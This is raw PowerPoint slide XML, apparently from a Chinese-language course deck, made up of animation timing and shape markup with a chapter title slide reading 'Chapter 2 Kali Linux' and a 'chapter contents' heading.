                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
